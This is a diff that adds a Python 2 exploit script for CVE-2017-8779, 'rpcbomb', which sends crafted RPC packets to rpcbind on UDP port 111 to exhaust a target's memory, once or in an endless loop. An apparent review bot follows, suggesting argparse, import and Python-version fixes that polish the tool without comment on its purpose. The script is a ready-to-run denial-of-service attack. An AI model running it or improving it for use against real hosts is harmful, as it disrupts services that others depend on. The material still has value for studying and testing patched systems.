CVE-2017-8779
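--- /dev/null
+++ b/CVE-2017-8779_rpcbomb.py
@@ -0,0 +1,83 @@
+#!/usr/bin/env python2
+#
+# CVE-2017-8779 aka rpcbomb.py
+# python implementation of rpcbomb
+# find page of bug author here: https://guidovranken.wordpress.com/
+# original ruby exploit: https://www.exploit-db.com/exploits/41974
+# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
+#
+# this one comes with loop and single packet, to consume memory over time and not just once
+#
+# i was not able to observe any sort of crash or alike
+# on the testsystem the cpu consumption went up to 50% (1 CPU)
+# memory allocation was done
+# syslogd reportedly mentions out of memory from rpcbind
+# depending on the environment and service offered probably interesting
+#
+# one packet
+# ./rpcbomb.py -t 127.0.0.1
+#
+# define memory allocation
+# ./rpcbomb.py -t 127.0.0.1 -l 1024
+#
+# endless mode
+# ./rpcbomb.py -t 127.0.0.1 -e
+#
+# 2nd June 2017
+# by dash
+
+import os
+import sys
+import struct
+import socket
+import argparse
+
+def run(args):
+
+    ip = args.ip
+    paylen = args.malloc
+    port = args.port
+
+    pkt = struct.pack('!I',0) # xid
+    pkt += struct.pack('!I',0) # message type CALL
+    pkt += struct.pack('!I',2) # RPC version 2
+    pkt += struct.pack('!I',100000) # Program
+    pkt += struct.pack('!I',4) # Program version
+    pkt += struct.pack('!I',9) # Procedure
+    pkt += struct.pack('!I',0) # Creds AUTH_NULL
+    pkt += struct.pack('!I',0) # Creds len 0
+    pkt += struct.pack('!I',0) # Creds AUTH_NULL
+    pkt += struct.pack('!I',0) # Creds len 0
+    pkt += struct.pack('!I',0) # Program: 0
+    pkt += struct.pack('!I',0) # Ver
+    pkt += struct.pack('!I',4) # Proc
+    pkt += struct.pack('!I',4) # Argument length
+    pkt += struct.pack('!I',paylen) # Payloadlen
+
+    while 1:
+        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        s.sendto(pkt, (ip, port))
+        data, addr = s.recvfrom(16384)
+        print '.',
+        sys.stdout.flush()
+        if not args.endless:
+            break
+
+    print
+    print 'Done'
+
+def main():
+    parser_desc = 'rpcbomb - python exploit by dash'
+    prog_desc = 'portbind memory exhaustion exploit'
+    parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc)
+    parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip')
+    parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int)
+    parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int)
+    parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless')
+
+
+    args = parser.parse_args()
+    run(args)
+
+if __name__ == "__main__":
+    main()
+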
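Review bot: The ArgumentParser call in main() passes a description string as `prog`, so the usage line argparse prints will read `usage: portbind memory exhaustion exploit [-h] -t IP ...` instead of the script name; `prog` is meant to be the program name, and argparse derives it from `sys.argv[0]` when the keyword is omitted. Dropping the keyword and folding both strings into the description, `parser = argparse.ArgumentParser(description=parser_desc + ' - ' + prog_desc)`, gives the intended help output without changing any other behaviour. Two smaller tidy-ups in the same file: `import os` is never used, and `data, addr` from `recvfrom` are assigned but never read, so a bare `s.recvfrom(16384)` would make it clear the reply is only awaited, not inspected. The header comment should also say explicitly that the file is Python 2 only (the `print` statements use statement syntax and will not parse under Python 3), since the shebang is currently the only hint.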